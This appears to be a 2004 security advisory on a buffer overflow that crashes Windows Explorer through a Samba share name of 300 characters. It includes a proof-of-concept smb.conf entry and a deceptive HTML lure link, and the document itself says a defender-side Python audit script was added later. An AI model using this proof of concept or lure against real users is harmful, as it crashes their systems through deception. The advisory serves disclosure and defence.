Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow
26 Apr. 2004
MS Explorer (explorer.exe) and MS Internet Explorer (IEXPLORE.EXE) are core pieces of Microsoft Windows operating systems. An unchecked buffer allows a malicious user to crash Microsoft Explorer by creating a shared directory with a long name and convincing the user to access it.
Affected: MS Internet Explorer and MS Explorer (explorer.exe) on the following platforms:
* Windows XP (all), Windows 2000 (all), Windows 98 (all), Windows ME (all)
* Windows 2003 not tested
In order to exploit this, an attacker must be able to get a user to connect to a malicious server that hosts a share whose name is 300 characters or longer.
Proof of Concept:
Windows will not allow you to create a share with such a long name, but of course Samba does. Once your Samba box is up and running, add a share to your smb.conf whose section name is 300 characters long (written here as [A x 300]):
[A x 300]
comment = Area 51
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung
After your server is up, just go to your Windows test box and open Start menu > Run > \\your.malicious.server.ip.
Plufff, Explorer will crash.
Or by social engineering, with a link such as: <a href="\\my.malicious.server.ip">Enter My 0day sploit archive l/p:n0ph33r</a>
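A defender-side check, added here and not part of the original advisory: a small Python audit that parses the section names in an smb.conf and flags any share whose name reaches the 300-character length described above, so a Samba administrator can verify no such share is being served. The sample configuration embedded below is constructed for the example.

```python
import re
from typing import List, Tuple

# Share names of this many characters or more are what the advisory describes
# as crashing Explorer, so the audit flags anything at or above it.
CRASH_LENGTH = 300

# A Samba section header: "[name]" with optional surrounding whitespace.
SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]*)\]\s*$")


def parse_share_names(smb_conf: str) -> List[str]:
    """Return the share (section) names in smb.conf text, skipping [global]
    and comment lines that begin with '#' or ';'."""
    names = []
    for line in smb_conf.splitlines():
        if line.lstrip().startswith(("#", ";")):
            continue
        match = SECTION_RE.match(line)
        if match and match.group("name").strip().lower() != "global":
            names.append(match.group("name"))
    return names


def find_overlong_shares(smb_conf: str, limit: int = CRASH_LENGTH) -> List[Tuple[str, int]]:
    """Return (abbreviated name, full length) for each share whose name is
    at least `limit` characters long."""
    return [(name[:16] + "...", len(name))
            for name in parse_share_names(smb_conf) if len(name) >= limit]


# Constructed sample: one ordinary share plus the advisory's "[A x 300]" share.
SAMPLE_SMB_CONF = "\n".join([
    "[global]",
    "workgroup = WORKGROUP",
    "; comment line that must be ignored",
    "[public]",
    "path = /srv/public",
    "[" + "A" * 300 + "]",
    "comment = Area 51",
    "path = /tmp/testfolder",
])

if __name__ == "__main__":
    for name, length in find_overlong_shares(SAMPLE_SMB_CONF):
        print(f"share {name} has a {length}-character name (>= {CRASH_LENGTH})")
```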
Workaround: from your network card settings, disable Client for Microsoft Networks until an official fix for this vulnerability is available.
Rodrigo Gutierrez notified the vendor at the beginning of 2002; according to the vendor's Knowledge Base article 322857, this vulnerability was supposed to have been fixed in Windows XP Service Pack 1 and Windows 2000 SP4.